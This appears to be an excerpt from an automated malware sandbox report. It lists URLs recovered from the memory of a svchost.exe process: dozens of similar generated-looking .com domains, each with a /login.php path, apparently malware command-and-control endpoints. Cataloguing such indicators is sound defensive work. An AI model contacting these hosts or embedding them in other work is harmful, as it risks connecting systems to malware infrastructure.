Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojymic.com/login.php
Source: svchost.exe, 00000002.00000003.2709443016.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670655678.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671925473.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojypat.com/H
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojypat.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298703099.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojypuc.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyquf.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyrak.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volybec.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volycem.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307945417.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320123040.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volycik.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296732942.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volydot.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volygyt.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volyjok.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volyjym.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volykyc.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308250175.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volypum.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3245948099.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3343594271.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802384900.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401732575.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volyrac.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://volyzef.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonybat.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320123040.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonycum.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonydik.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonygec.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000003.2538146592.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2501199142.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonyket.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonymoc.com/login.php
